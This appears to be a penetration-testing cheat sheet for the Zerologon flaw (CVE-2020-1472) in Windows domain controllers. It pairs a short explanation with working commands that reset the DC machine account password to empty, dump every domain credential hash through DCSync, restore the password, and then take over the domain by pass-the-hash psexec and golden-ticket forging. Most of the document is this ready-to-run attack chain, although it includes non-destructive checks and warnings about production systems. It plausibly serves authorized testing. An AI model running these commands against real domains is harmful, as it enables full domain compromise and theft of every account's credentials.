Overview
CVE-2020-1472 (Zerologon). Authentication bypass in the Netlogon Remote Protocol (MS-NRPC): ComputeNetlogonCredential encrypts with AES-CFB8 under an all-zero IV, so for roughly 1 in 256 session keys an all-zero client challenge yields an all-zero credential, and an unauthenticated client can impersonate the DC's own machine account after an expected ~256 attempts. The attacker then calls NetrServerPasswordSet2 to set the DC machine account password to empty, authenticates as DC_HOSTNAME$ with that empty password, and DCSyncs every hash in the domain. CVSS 10.0, Critical.
The exploit changes the DC machine account password in Active Directory only; the DC's own copy of that password (the $MACHINE.ACC LSA secret in its registry) is untouched, so the two no longer match and the DC can no longer authenticate as itself. Replication, DNS and other DC services break until the original password is put back. Always restore the original password (the plain_password_hex from the DC's LSA secrets, not just an NT hash) as soon as DCSync is done, and do not run the exploit against production DCs when the tester script is enough to prove the vulnerability.
Check Vulnerability
# CrackMapExec zerologon module: only attempts the authentication bypass, does not change the password
crackmapexec smb DC_IP -u '' -p '' -M zerologon
# https://github.com/SecuraBV/CVE-2020-1472
# Secura's tester: same non-destructive check; DC_HOSTNAME is the DC's NetBIOS name, not the FQDN
python3 zerologon_tester.py DC_HOSTNAME DC_IP
Exploit
Set Password to Empty
# https://github.com/dirkjanm/CVE-2020-1472
# Repeats the zero-challenge authentication until it succeeds (expected ~256 attempts, script gives up
# after 2000), then calls NetrServerPasswordSet2 to set the DC machine account password to empty.
# DC_HOSTNAME is the NetBIOS name of the DC.
python3 cve-2020-1472-exploit.py DC_HOSTNAME DC_IP
DCSync with Empty Password
# Authenticate as the DC machine account with its now-empty password and DCSync the whole NTDS
impacket-secretsdump -no-pass -just-dc DOMAIN/'DC_HOSTNAME$'@DC_IP
Restore Machine Account Password
Get the Original Password (plain_password_hex) First
# The DC_HOSTNAME$ NT hash in the DCSync output is useless for the restore: after the exploit it is
# simply the hash of the empty password (31d6cfe0d16ae931b73c59d7e0c089c0). The original password still
# lives in the DC's own LSA secrets ($MACHINE.ACC). Dump them with the Domain Admin hash from DCSync,
# this time without -just-dc so SAM and LSA secrets are included:
impacket-secretsdump -hashes :ADMIN_NTLM_HASH DOMAIN/administrator@DC_IP
# In the "Dumping LSA Secrets" section note both lines:
# $MACHINE.ACC:plain_password_hex:ORIGINAL_HEX_PASSWORD
# $MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:ORIGINAL_NTLM_HASH
Restore
# https://github.com/dirkjanm/CVE-2020-1472
# First DC_HOSTNAME is the account being reset, second is the target host; pass the full hex string
python3 restorepassword.py DOMAIN/DC_HOSTNAME@DC_HOSTNAME -target-ip DC_IP -hexpass ORIGINAL_HEX_PASSWORD
Verify Restore
# A fresh DCSync of the machine account must now show ORIGINAL_NTLM_HASH, not the empty-password hash.
# The empty password no longer works, so authenticate with the Domain Admin hash instead of -no-pass
impacket-secretsdump -hashes :ADMIN_NTLM_HASH -just-dc-user 'DC_HOSTNAME$' DOMAIN/administrator@DC_IP
Post-Exploitation
After DCSync:
# PtH as Domain Admin
impacket-psexec DOMAIN/administrator@DC_IP -hashes :NTLM_HASH
# Golden ticket
impacket-ticketer -nthash KRBTGT_HASH -domain-sid SID -domain DOMAIN administrator
Quick Reference
| Step | Command |
|---|---|
| Check | crackmapexec smb DC_IP -u '' -p '' -M zerologon |
| Exploit | python3 cve-2020-1472-exploit.py DC_NAME DC_IP |
| DCSync | secretsdump -no-pass -just-dc DOMAIN/'DC$'@DC_IP |
| Get hexpass | secretsdump -hashes :ADMIN_NTLM_HASH DOMAIN/administrator@DC_IP (read $MACHINE.ACC plain_password_hex) |
| Restore | python3 restorepassword.py DOMAIN/DC_NAME@DC_NAME -target-ip DC_IP -hexpass ORIGINAL_HEX_PASSWORD |